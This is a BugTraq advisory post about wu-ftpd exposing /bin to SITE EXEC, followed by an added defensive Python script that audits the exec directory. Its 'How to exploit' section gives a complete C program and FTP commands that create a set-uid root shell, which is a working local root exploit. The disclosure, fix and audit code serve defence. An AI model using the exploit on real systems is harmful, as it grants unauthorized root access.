The following is gleaned from the BugTraq mailing list:
-------------------------------------------------------

Since Bugtraq is exceptionally quiet lately, I thought I should make it come alive again with this discussion of the bug that was reported in the wu.ftpd that comes with some Slackware distributions of Linux. The report was just before Bugtraq went down for a long time, but I've found the bug still to be present on all the Linux machines that I have access to. So maybe it needs to be brought a little more into the open. Here we go:

ObBug:

- Short description of the bug

It involves wu.ftpd being misconfigured at compile time and allowing SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users this is ~ftp/bin). Now if in this /bin resides a program that gives access to executables outside /bin, but within the user's reach (such as /bin/bash, which gives access to the user's homedir), this opens up a root vulnerability. This should have been set to /bin/ftp-exec, which can be set by the _PATH_EXECPATH variable in src/pathnames.h before compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the net has this securely set as the default value.

- How to check?

  $ ftp -n localhost
  user:
  password:
  ftp> quote site exec bash -c id

If vulnerable it gives here:

  uid=0, gid=0, euid=, egid=

Of course, bash should not be available at all.

- How to exploit (in case your sysadmin or you think the above is not a problem)

Go to your homedir and make a program: duh.c (or whatever)

  #include <stdlib.h>
  #include <unistd.h>

  int main(void)
  {
      seteuid(0);                        /* ftpd's saved root id is still there */
      setegid(0);
      system("/bin/cp /bin/sh ./sh");    /* copy a shell into the home dir */
      system("/bin/chmod 6755 ./sh");    /* and make it set-uid/set-gid root */
      return 0;
  }

  $ make duh
  $ ftp -n localhost (and login)
  user:
  password:
  ftp> quote site exec bash -c duh
  ftp> quit
  $ ./sh
  bash# (voila, QED)

- How to fix?

Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive doesn't compile on Linux) and compile it; you might want to define _PATH_PIDNAMES and _PATH_XFERLOG to other values there (/usr/adm/ftp.pids-%s and /usr/adm/xferlog, for example). If you cannot find that I can email the source to you... if you trust the source I took somewhere unmodified and if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too. I can remember that I got it that way. $)

Henri Karrenbeld
-----------------------------------------------------------------------------
Hardware, n.: The parts of a computer system that can be kicked.
-----------------------------------------------------------------------------
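The post's fix is a compile-time setting (_PATH_EXECPATH) plus keeping shells out of the directory it names. The script below is an added example, not part of the original post or of wu-ftpd, that audits the SITE EXEC directory inside an FTP chroot from the defender's side: it flags an exec path that is the chroot's general /bin, any shell or interpreter sitting in the exec directory, and set-uid or world-writable entries. The FTP root, the program names and the list of interpreter names are constructed for the example; it builds a throwaway directory tree rather than touching a real ~ftp.

```python
import os
import stat
import tempfile

# Programs that hand a SITE EXEC caller an arbitrary-command primitive.
# Constructed list for this example; extend to taste.
INTERPRETERS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh", "perl", "python"}

# Exec paths that expose a whole system bin directory (assumption: any of these is wrong).
GENERAL_BIN_DIRS = {"/bin", "/usr/bin", "/sbin", "/usr/sbin"}


def audit_exec_path(ftp_root, exec_path="/bin/ftp-exec"):
    """Audit the directory that wu-ftpd's _PATH_EXECPATH resolves to inside the
    chroot at ftp_root. Returns a list of (severity, message) findings."""
    findings = []
    norm = os.path.normpath("/" + exec_path.lstrip("/"))
    if norm in GENERAL_BIN_DIRS:
        findings.append(("high", f"_PATH_EXECPATH is {norm}: every program in the chroot's {norm} "
                                 "is reachable through SITE EXEC"))
    exec_dir = os.path.join(ftp_root, norm.lstrip("/"))
    if not os.path.isdir(exec_dir):
        findings.append(("info", f"{norm} does not exist under {ftp_root}; SITE EXEC has nothing to run"))
        return findings

    for name in sorted(os.listdir(exec_dir)):
        full = os.path.join(exec_dir, name)
        st = os.lstat(full)
        if stat.S_ISLNK(st.st_mode):
            findings.append(("medium", f"{name} is a symlink; it may point outside {norm}"))
            continue
        if not stat.S_ISREG(st.st_mode) or not (st.st_mode & 0o111):
            continue  # not an executable file: SITE EXEC cannot run it
        if name in INTERPRETERS:
            findings.append(("high", f"{name} is an interpreter reachable through SITE EXEC"))
        if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append(("medium", f"{name} is set-uid/set-gid"))
        if st.st_mode & stat.S_IWOTH:
            findings.append(("medium", f"{name} is world-writable: anyone can replace what SITE EXEC runs"))
    return findings


def build_constructed_ftp_root(root, exec_subdir, programs):
    """Create a stand-in chroot tree under root with executable stubs named
    `programs` in exec_subdir (constructed for this example, not a real ~ftp)."""
    d = os.path.join(root, exec_subdir.lstrip("/"))
    os.makedirs(d, exist_ok=True)
    for name in programs:
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, 0o755)
    return d


def demo():
    """Audit the misconfigured layout from the post and the fixed one side by side."""
    with tempfile.TemporaryDirectory() as root:
        # Misconfigured: _PATH_EXECPATH left at /bin, which also holds bash.
        build_constructed_ftp_root(root, "/bin", ["ls", "compress", "bash"])
        bad = audit_exec_path(root, "/bin")
        # Fixed: _PATH_EXECPATH = /bin/ftp-exec holding only the intended helpers.
        build_constructed_ftp_root(root, "/bin/ftp-exec", ["ls", "compress"])
        good = audit_exec_path(root, "/bin/ftp-exec")
    return bad, good


if __name__ == "__main__":
    for label, result in zip(("misconfigured", "fixed"), demo()):
        print(label, result)
```

Run it against a real chroot with `audit_exec_path("/home/ftp", "/bin/ftp-exec")`, substituting whatever _PATH_EXECPATH was compiled in; an empty result for the fixed layout is the expected outcome, and any "high" finding means the post's scenario applies.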